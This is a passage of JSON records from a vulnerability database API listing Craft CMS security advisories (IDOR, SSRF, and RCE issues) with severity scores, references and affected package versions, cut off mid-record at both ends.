5.9.0-beta.1"}],"aliases":["CVE-2026-28695","GHSA-94rc-cqvm-m4pw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qwmy-d2e8-5khw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50604?format=json","vulnerability_id":"VCID-qywv-vf4r-8bh9","summary":"Craft CMS has IDOR via GraphQL @parseRefs\nThe GraphQL directive `@parseRefs`, intended to parse internal reference tags (e.g., `{user:1:email}`), can be abused by both authenticated users and unauthenticated guests (if a Public Schema is enabled) to access sensitive attributes of any element in the CMS. The implementation in `Elements::parseRefs` fails to perform authorization checks, allowing attackers to read data they are not authorized to view.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28696","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07081","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28696"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/4d98a07e47580f1712095825d3e3c4d67bc9f8b9","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T18:00:48Z/"}],"url":"https://github.com/craftcms/cms/commit/4d98a07e47580f1712095825d3e3c4d67bc9f8b9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28696","reference_id":"CVE-2026-28696","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28696"},{"reference_url":"https://github.com/advisories/GHSA-7x43-mpfg-r9wj","reference_id":"GHSA-7x43-mpfg-r9wj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7x43-mpfg-r9wj"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7x43-mpfg-r9wj","reference_id":"GHSA-7x43-mpfg-r9wj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-04T18:00:48Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7x43-mpfg-r9wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28696","GHSA-7x43-mpfg-r9wj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qywv-vf4r-8bh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56504?format=json","vulnerability_id":"VCID-r5hp-5nju-9ubz","summary":"Craft CMS has a potential RCE with a compromised security key\nThis is an RCE vulnerability that affects Craft 4 and 5 installs where your security key has already been compromised.\n\nhttps://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret\n\nAnyone running an unpatched version of Craft with a compromised security key is affected.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23209","reference_id":"","reference_type":"","scores":[{"value":"0.1639","scoring_system":"epss","scoring_elements":"0.94998","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23209"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://craftcms.com/knowledge-base/securing-craft#keep-your-secrets-secret"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://github.com/craftcms/cms/commit/e59e22b30c9dd39e5e2c7fe02c147bcbd004e603"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-23209","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-23209"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23209","reference_id":"CVE-2025-23209","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23209"},{"reference_url":"https://github.com/advisories/GHSA-x684-96hh-833x","reference_id":"GHSA-x684-96hh-833x","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-x684-96hh-833x"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x","reference_id":"GHSA-x684-96hh-833x","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2025-02-21T04:56:13Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x684-96hh-833x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83868?format=json","purl":"pkg:composer/craftcms/cms@4.13.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.13.8"},{"url":"http://public2.vulnerablecode.io/api/packages/83867?format=json","purl":"pkg:composer/craftcms/cms@5.5.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.5.8"}],"aliases":["CVE-2025-23209","GHSA-x684-96hh-833x"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r5hp-5nju-9ubz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49561?format=json","vulnerability_id":"VCID-rb7c-3nkc-gkeg","summary":"Craft CMS vulnerable to Server-Side Request Forgery (SSRF) via GraphQL Asset Upload Mutation\nThe Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume.\n\nUsers should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue.References:\n\nhttps://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68437","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03989","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68437"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52","reference_id":"","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68437","reference_id":"CVE-2025-68437","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68437"},{"reference_url":"https://github.com/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x27p-wfqw-hfcc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"5.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:27:06Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73170?format=json","purl":"pkg:composer/craftcms/cms@4.16.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.17"},{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68437","GHSA-x27p-wfqw-hfcc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rb7c-3nkc-gkeg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91012?format=json","vulnerability_id":"VCID-rzq4-h1ms-nqef","summary":"Craft CMS vulnerable to behavior injection RCE ElementIndexesController and FieldsController\nThe fix for https://github.com/advisories/GHSA-7jx7-3846-m7w7 (commit https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748) only patched `src/services/Fields.php`, but the same vulnerable pattern exists in `ElementIndexesController` and `FieldsController`.\n\nYou need Craft control panel administrator permissions, and allowAdminChanges must be enabled for this to work.\n\nAn attacker can use the same gadget chain from the original advisory to achieve RCE.\n\nUsers should update to Craft 4.17.5 and 5.9.11 to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32264","reference_id":"","reference_type":"","scores":[{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15357","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32264"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/78d181e12e0b15e1300f54ec85f19859d3300f70","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/commit/78d181e12e0b15e1300f54ec85f19859d3300f70"},{"reference_url":"https://github.com/craftcms/cms/commit/dfec46362fcb40b330ce8a4d8136446e65085620","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/commit/dfec46362fcb40b330ce8a4d8136446e65085620"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4484-8v2f-5748","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/